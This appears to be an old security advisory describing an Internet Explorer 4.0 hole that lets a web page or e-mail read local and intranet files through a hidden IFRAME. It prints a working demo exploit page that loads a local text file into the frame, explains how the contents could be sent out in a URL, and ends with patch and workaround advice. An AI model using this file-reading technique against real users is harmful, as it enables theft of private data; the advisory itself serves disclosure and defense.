COMMAND

    MS Internet Explorer

SYSTEMS AFFECTED

    Win systems running MSIE 4.0

PROBLEM

    A dangerous security  hole in Internet  Explorer 4.0 was  detected
    by Ralf  Hueskes of  Jabadoo Communications.   His tests  revealed
    that it is possible  to spy on the  contents of any text  and HTML
    files on  somebody else's  computer. Not  only local  files are in
    danger, but also data on your  company's intranet - even if it  is
    protected by a  firewall.  The  code needed for  infiltrating your
    files  can  be  hidden  in  any  normal  Web  page or in an e-mail
    message.

    The security hole exists even if users have activated the  highest
    security  level  in  their  browser.  The problem affects both the
    German and the English version of the Internet Explorer.

    The spy pages make use of JScript.   If a user accesses a page  or
    receives an e-mail containing  this code, infiltration begins  ...
    The spy page contains a so-called IFRAME sized 1 by 1 pixel.  When
    a user  accesses the  page or  opens the  e-mail message,  a small
    Jscript program loads the  HTML or text file  to be spied on  into
    this frame.   The contents  of the  frame can  then be  read using
    Dynamic HTML and sent  as a parameter hidden  in a URL to  any Web
    server in the Internet.  Demo exploit (from Jabadoo) follows:

    <HTML>
    <HEAD>
	    <TITLE>IE4 Jabadoo Hack</TITLE>

    <SCRIPT LANGUAGE="JavaScript">

    function init()
    {
	    document.all("MyFrame1").src = 'file://c:/Windows/desktop/t1.txt';
	    setTimeout ('getLinks()', 5000);
    }

    function getLinks()
    {
	    alert(document.all("MyFrame1").document.body.outerHTML);
    }

    </SCRIPT>

    </HEAD>
    <BODY onLoad="init()">

    <A HREF="http://www.jabadoo.de/"><IMG SRC="/images/logo-small.gif" BORDER=0></A>

    <FONT SIZE=2 FACE=Arial><P>This sample page shows the first part of the <B>jabadoo hack</B>: </P>

    <P>With a delay of 5 seconds, the content of the file C:\WINDOWS\DESKTOP\T1.TXT is loaded by this sample page and displayed in a message box. </P>
    <P>In a second step, this content could be hidden in an url and transfered to every server on the net ...</P>
    <P>If you get an error message, the timeout of 5 seconds is propably too short or the file C:\WINDOWS\DESKTOP\T1.TXT does not exist on your computer ...</P>

    <P><B><A HREF="ie4_us.html">English Press Release</A></B></P>

    <P><B><A HREF="ie4.html">German Press Release</A></B></P>

    <IFRAME STYLE="width=1px; height=1px;" NAME="MyFrame1" SRC="blank.html" >

    </FONT>

    </BODY>
    </HTML>

    Additional information  can also  be found  in c't  magazine, vol.
    12/97 (to be published on 10/27/97):

        http://www.heise.de/ct/

SOLUTION

    Download the patch which provides an easy and complete fix for the
    problem:

        http://www.microsoft.com/msdownload/ieplatform/ie4patch/ie4patch.htm

    Experienced   users   can   protect   themselves   by   completely
    deactivating the  execution of  Active Scripting  in the  security
    settings (menu item:  View/Options/Security, Settings/Custom  (for
    expert users)/Active Scripting/Disable) and by using the  Security
    Zones feature in Internet Explorer 4.0.